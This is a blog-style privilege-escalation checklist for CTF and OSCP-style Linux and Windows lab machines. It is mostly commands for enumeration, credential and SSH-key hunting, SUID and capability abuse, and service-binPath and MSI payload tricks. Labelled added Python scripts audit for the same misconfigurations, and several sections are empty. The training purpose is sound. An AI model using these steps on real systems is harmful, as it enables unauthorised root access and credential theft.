
The Privilege Escalation Playbook — Linux & Windows

A practical, command-driven walkthrough for Linux & Windows boxes — HackTheBox / OSCP style. The exact mental model Doomsknight uses on every box, from stable shell to root flag.

2026-05-01

Privilege Escalation

Published by Doomsknight · KnightSec · Reading time: ~15 minutes


Introduction

If you've ever sat staring at a low-priv shell wondering "now what?" — this post is for you.

Privilege escalation is the art of turning a foothold into ownership. It's where most CTF players (and honestly, most pentesters) get stuck. The trick isn't memorizing every CVE — it's having a methodical checklist you can run top-down, knowing the cheap, common wins come first and the noisy kernel exploits come dead last.

What follows is the exact mental model I use on every box. Work through it in order. Don't skip steps because you "feel" the answer is somewhere else — discipline beats intuition here.


🐧 Part 1 — Linux Privilege Escalation

0. First Thing: Get a Stable Shell

Before anything else, upgrade your shell. A broken reverse shell where Ctrl+C kills your session and tab-completion doesn't work will cost you hours. Fix it now.

BASH
python3 -c 'import pty; pty.spawn("/bin/bash")'
# then Ctrl+Z
stty raw -echo; fg
export TERM=xterm

1. System & Kernel Enumeration

BASH
uname -a                  # kernel version
cat /etc/os-release       # distro
arch                      # 32 vs 64 bit
hostname

Note the kernel version and check exploit-db or run searchsploit linux kernel <version>. But — and this is important — don't lead with kernel exploits. They're noisy, can crash the box, and reset your progress. Save them for last.

2. User Context (always start here)

BASH
id
whoami
groups
sudo -l                   # ★ huge — check NOPASSWD entries
cat /etc/passwd | grep -v nologin
cat /etc/group

If sudo -l shows any binary, your next stop is GTFOBins (https://gtfobins.github.io). That site alone solves a startling percentage of easy/medium boxes.

Watch out for these groups: docker, lxd, disk, adm, video, sudo, wheel — each has a known abuse path.

3. SUID / SGID Binaries

BASH
find / -perm -u=s -type f 2>/dev/null
find / -perm -g=s -type f 2>/dev/null
find / -perm -4000 -type f 2>/dev/null

Cross-reference each non-default binary with GTFOBins. Standard ones (passwd, su, mount, ping) are usually safe. The interesting ones — find, nmap, vim, python, or anything custom — are gold.

4. Linux Capabilities

BASH
getcap -r / 2>/dev/null

cap_setuid+ep on python, perl, or ruby is an instant root. Example:

BASH
python -c 'import os; os.setuid(0); os.system("/bin/sh")'

5. Cron Jobs

BASH
cat /etc/crontab
ls -la /etc/cron.*
crontab -l
cat /var/spool/cron/crontabs/* 2>/dev/null

Look for writable scripts run by root. Two specific patterns to hunt for: PATH manipulation in crontab and wildcard issues (e.g. tar * in a writable dir — a classic).

6. Writable Files & PATH Hijacking

BASH
find / -writable -type d 2>/dev/null            # writable dirs
find / -perm -o+w -type f 2>/dev/null           # world-writable files
echo $PATH

If a script run by root calls a binary by name (no full path), and any earlier $PATH entry is writable, drop a malicious binary there. Done.
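To turn the cron and PATH checks from sections 5 and 6 into a repeatable audit, here is an added Python example that is not part of the original post: it parses /etc/crontab-format text and flags root jobs that call a bare program name while some PATH directory is world-writable, jobs whose script file is world-writable, and jobs that expand a bare `*`. The crontab text, the temp directory and the file names in `demo()` are constructed for the demonstration.

```python
import os
import tempfile

def world_writable(path: str) -> bool:
    """True if the path exists and its mode bits grant write to 'other'."""
    try:
        return bool(os.stat(path).st_mode & 0o002)
    except OSError:
        return False

def audit_crontab(text: str) -> list[str]:
    """Flag root jobs in /etc/crontab-format text (m h dom mon dow user command)."""
    findings = []
    cron_path = "/usr/bin:/bin"  # cron's default when the file sets no PATH
    for raw in text.splitlines():
        line = raw.strip()
        if not line or line.startswith("#"):
            continue
        if "=" in line.split()[0]:  # variable line such as PATH=... or SHELL=...
            key, _, value = line.partition("=")
            cron_path = value.strip() if key.strip() == "PATH" else cron_path
            continue
        fields = line.split(None, 6)
        if len(fields) < 7 or fields[5] != "root":
            continue
        for segment in fields[6].replace("&&", ";").split(";"):
            tokens = segment.split()
            if not tokens or tokens[0] == "cd":  # cd is a builtin, not a PATH lookup
                continue
            prog = tokens[0]
            if "/" not in prog:  # bare name: resolved through PATH, so every PATH dir must be trusted
                bad = next((d for d in cron_path.split(":") if world_writable(d)), None)
                if bad:
                    findings.append(f"PATH hijack: '{prog}' resolved via writable {bad}")
            elif world_writable(prog):  # anyone can edit what root will execute
                findings.append(f"writable script: {prog}")
            if "*" in tokens[1:]:  # the shell expands '*' in the job's cwd (the tar * classic)
                findings.append(f"wildcard expansion: {segment.strip()}")
    return findings

def demo() -> list[str]:
    """Constructed sample: a world-writable PATH dir and script in a temp dir, then audit."""
    root = tempfile.mkdtemp()
    bin_dir, script = os.path.join(root, "bin"), os.path.join(root, "cleanup.sh")
    os.mkdir(bin_dir); os.chmod(bin_dir, 0o777)
    open(script, "w").close(); os.chmod(script, 0o666)
    crontab = (f"PATH={bin_dir}:/usr/bin:/bin\n*/5 * * * * root backup.sh\n"
               f"0 2 * * * root {script}\n0 3 * * * root cd /var/www/html && tar czf /backup/site.tgz *\n"
               "0 4 * * * www-data /usr/bin/php /var/www/cron.php")
    return audit_crontab(crontab)
```

Running `demo()` yields four findings: two PATH hijack hits (`backup.sh` and `tar`), the writable `cleanup.sh`, and the wildcard in the tar job; the www-data job is ignored because it does not run as root.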

7. Credentials & Secrets Hunting

BASH
cat ~/.bash_history
cat /home/*/.bash_history 2>/dev/null
grep -r -i "password" /etc/ 2>/dev/null
grep -r -i "passwd" /var/www/ 2>/dev/null
find / -name "*.conf" -readable 2>/dev/null
find / -name "id_rsa*" 2>/dev/null
find / -name "*.kdbx" 2>/dev/null               # KeePass DBs
cat /etc/fstab                                  # mount creds sometimes here

Always check web roots: /var/www/html, /opt/, /srv/ for DB creds and config files. Files like mysql_history, psql_history, and .viminfo often leak commands with passwords still in them.

8. SSH Keys

BASH
ls -la ~/.ssh /home/*/.ssh /root/.ssh 2>/dev/null
find / -name "authorized_keys" 2>/dev/null
find / -name "id_rsa" 2>/dev/null

A world-readable private key is direct lateral or vertical movement.

9. NFS Mounts

BASH
cat /etc/exports
showmount -e <target>          # from attacker box

no_root_squash → mount the share as root locally and drop a SUID binary. Easy win when it shows up.

10. Docker / LXD Group

11. Sudo Misconfigurations / Version

BASH
sudo --version

12. Services & Processes

BASH
ps auxf
ps -ef | grep root
netstat -tulnp 2>/dev/null
ss -tulnp

Internal services bound to 127.0.0.1 are often the path. Port-forward them and have a look.

13. Automated Enumeration (run ONE then verify manually)


🪟 Part 2 — Windows Privilege Escalation

Windows priv-esc has a different rhythm. Where Linux rewards reading config files, Windows rewards reading token privileges and service ACLs. Start there.

1. Baseline Enumeration

CMD
whoami /all
whoami /priv
whoami /groups
systeminfo
hostname
net user
net localgroup administrators

2. Token Privileges (★ check first, biggest wins)

Look at whoami /priv for any of these:

Privilege              | Exploit
SeImpersonatePrivilege | JuicyPotato / PrintSpoofer / GodPotato / RoguePotato
SeAssignPrimaryToken   | Same potato family
SeBackupPrivilege      | Read SAM/SYSTEM hives → dump hashes
SeRestorePrivilege     | Overwrite system files
SeTakeOwnership        | Take ownership of sensitive files
SeDebugPrivilege       | Inject into SYSTEM processes
SeLoadDriver           | Load malicious driver

If you're a service account (IIS APPPOOL\*, NT SERVICE\*, mssql-svc) → almost always SeImpersonate → PrintSpoofer is the modern go-to.

CMD
PrintSpoofer.exe -i -c cmd
GodPotato.exe -cmd "cmd /c whoami"
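An added Python example (not from the original post) that turns the table above into a check: it parses `whoami /priv` output and reports which of the high-risk privileges a token holds, which is the review to run when deciding what a service account should be allowed to keep. The `whoami /priv` text is a constructed sample for an application pool account.

```python
import re

# Privileges from the table above and why each matters (same mapping as the post).
HIGH_RISK = {
    "SeImpersonatePrivilege": "token impersonation (potato family)",
    "SeAssignPrimaryTokenPrivilege": "token impersonation (potato family)",
    "SeBackupPrivilege": "read SAM/SYSTEM hives",
    "SeRestorePrivilege": "overwrite system files",
    "SeTakeOwnershipPrivilege": "take ownership of sensitive files",
    "SeDebugPrivilege": "debug access to SYSTEM processes",
    "SeLoadDriverPrivilege": "load a driver",
}

# Constructed `whoami /priv` output for an IIS application pool account (sample data).
SAMPLE_WHOAMI_PRIV = """\
PRIVILEGES INFORMATION
----------------------

Privilege Name                Description                               State
============================= ========================================= ========
SeAssignPrimaryTokenPrivilege Replace a process level token             Disabled
SeIncreaseQuotaPrivilege      Adjust memory quotas for a process        Disabled
SeChangeNotifyPrivilege       Bypass traverse checking                  Enabled
SeImpersonatePrivilege        Impersonate a client after authentication Enabled
SeCreateGlobalPrivilege       Create global objects                     Enabled
"""

PRIV_LINE = re.compile(r"^(Se\w+Privilege)\s+.*?\s+(Enabled|Disabled)\s*$")

def parse_privileges(output: str) -> dict[str, str]:
    """Map privilege name -> state from `whoami /priv` text, ignoring headers and rulers."""
    privs = {}
    for line in output.splitlines():
        m = PRIV_LINE.match(line.strip())
        if m:
            privs[m.group(1)] = m.group(2)
    return privs

def risky_privileges(output: str) -> list[tuple[str, str, str]]:
    """Return (privilege, state, why) for each high-risk privilege the token holds.
    'Disabled' still counts: the holder can re-enable it with AdjustTokenPrivileges."""
    return [(name, state, HIGH_RISK[name])
            for name, state in parse_privileges(output).items() if name in HIGH_RISK]

if __name__ == "__main__":
    for name, state, why in risky_privileges(SAMPLE_WHOAMI_PRIV):
        print(f"{name:32} {state:9} {why}")
```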

3. Unquoted Service Paths

CMD
wmic service get name,displayname,pathname,startmode | findstr /i "auto" | findstr /i /v "c:\windows\\" | findstr /i /v """

If the path is C:\Program Files\Some Folder\service.exe (unquoted, with spaces) and any parent dir is writable → drop Program.exe.
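An added Python example, not from the original post, that shows why the unquoted path matters: it applies the same filter as the wmic pipeline above to auto-start services and lists the intermediate executables Windows looks for before reaching the real binary, which are exactly the locations whose directory ACLs need checking (and why the fix is to quote the ImagePath). The wmic output is a constructed sample with invented service names.

```python
import re

# Constructed `wmic service get name,pathname,startmode` output; service names are invented.
SAMPLE_WMIC = r"""Name        PathName                                          StartMode
Spooler     C:\Windows\System32\spoolsv.exe                   Auto
UpdaterSvc  C:\Program Files\Some Folder\Sub Dir\service.exe  Auto
GoodSvc     "C:\Program Files\Good Vendor\good.exe" -service  Auto
LazySvc     C:\Tools\svc.exe /run                             Manual
"""

SERVICE_LINE = re.compile(r"^(\S+)\s+(.+?)\s+(Auto|Manual|Disabled)\s*$")

def unquoted_candidates(pathname: str) -> list[str]:
    """For an unquoted path with spaces, return the executables Windows tries, in
    order, before reaching the real binary: the path is cut at each space and '.exe'
    appended. A quoted path, or one whose binary comes before any space, yields []."""
    if pathname.startswith('"'):
        return []
    tokens = pathname.split()
    candidates = []
    for i in range(1, len(tokens)):
        prefix = " ".join(tokens[:i])
        if prefix.lower().endswith(".exe"):  # real binary reached; the rest are arguments
            break
        candidates.append(prefix + ".exe")
    return candidates

def audit_services(wmic_output: str) -> list[tuple[str, list[str]]]:
    """Return (service, candidate paths) for auto-start services with an unquoted spaced
    path. The parent directory of each candidate is where the ACL must deny write to
    ordinary users; quoting the ImagePath removes the lookup entirely."""
    findings = []
    for line in wmic_output.splitlines():
        m = SERVICE_LINE.match(line.rstrip())
        if not m or m.group(3) != "Auto":
            continue
        cands = unquoted_candidates(m.group(2))
        if cands:
            findings.append((m.group(1), cands))
    return findings
```

For `UpdaterSvc` the candidates are `C:\Program.exe`, `C:\Program Files\Some.exe` and `C:\Program Files\Some Folder\Sub.exe`; `wmic` is deprecated on current Windows, and `Get-CimInstance Win32_Service` exposes the same PathName and StartMode fields if you need to collect the input there.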

4. Service Permissions

CMD
accesschk.exe /accepteula -uwcqv "Authenticated Users" *
accesschk.exe /accepteula -uwcqv "Users" *

SERVICE_ALL_ACCESS or SERVICE_CHANGE_CONFIG on a service → modify binPath to your payload, restart.

CMD
sc config <service> binPath= "C:\path\to\rev.exe"
sc start <service>

5. AlwaysInstallElevated

CMD
reg query HKCU\SOFTWARE\Policies\Microsoft\Windows\Installer /v AlwaysInstallElevated
reg query HKLM\SOFTWARE\Policies\Microsoft\Windows\Installer /v AlwaysInstallElevated

Both = 0x1 → craft an MSI with msfvenom, run msiexec /quiet /qn /i evil.msi → SYSTEM.

6. Stored Credentials

CMD
cmdkey /list
runas /savecred /user:ADMIN cmd
dir /a:h /s C:\Users\*.kdbx 2>nul
findstr /si "password" *.xml *.ini *.txt *.config 2>nul

Two unsexy but reliable hunting spots:

7. Registry Autoruns & Writable Keys

CMD
reg query HKLM\Software\Microsoft\Windows\CurrentVersion\Run
reg query HKCU\Software\Microsoft\Windows\CurrentVersion\Run

If a Run entry points to a writable binary → replace it.

8. Scheduled Tasks

CMD
schtasks /query /fo LIST /v

Look for tasks running as a higher-priv user with writable script paths.

9. DLL Hijacking

Use Process Monitor (or look at imports) → find a process searching for a missing DLL in a writable location → drop your DLL there.

10. Saved Browser / App Creds

11. Automated Enumeration

12. Kernel / Patch Exploits (last resort)

CMD
systeminfo > sysinfo.txt

Feed to Windows Exploit Suggester (WES-NG) offline. Common hits: Juicy Potato (≤ Server 2016), MS16-032, MS17-010 (yes, sometimes still on HTB easy boxes), PrintNightmare (CVE-2021-34527).


📚 Reference Cheatsheets — Bookmark These

Resource             | URL
GTFOBins (Linux)     | https://gtfobins.github.io
LOLBAS (Windows)     | https://lolbas-project.github.io
HackTricks           | https://book.hacktricks.xyz
PayloadsAllTheThings | https://github.com/swisskyrepo/PayloadsAllTheThings
PEASS-ng             | https://github.com/peass-ng/PEASS-ng

🎯 General Methodology — The Six Rules

  1. Get a stable shell first. Don't enumerate from a broken reverse shell.
  2. Manual enumeration before automated. sudo -l, id, whoami /priv — these alone solve 60% of easy/medium boxes.
  3. One automated tool, then verify. Run LinPEAS/WinPEAS, but read the output — don't blindly trust the red highlights.
  4. Pivot through internal services. A service bound to 127.0.0.1 that you can hit is often the answer.
  5. Document credentials as you find them. A user password often gets reused for sudo, su, SSH, or admin services.
  6. If stuck for >30 min: re-enumerate as the new user. Every shell context is a new enumeration cycle.

Closing Thoughts

Privilege escalation is less about being clever and more about being thorough. The boxes that crush you aren't the ones with obscure exploits — they're the ones where you skipped step 2 because you assumed it'd be empty.

Run the checklist. Trust the process. The root flag will follow.

If this helped, share it with someone who's grinding through their first OSCP-style box. And if you spot a technique I've missed — drop me a note. This list grows every time I learn something new.

— Doomsknight


Have feedback or want to discuss a technique? Reach out via WhatsApp: +1 (347) 260-3596.
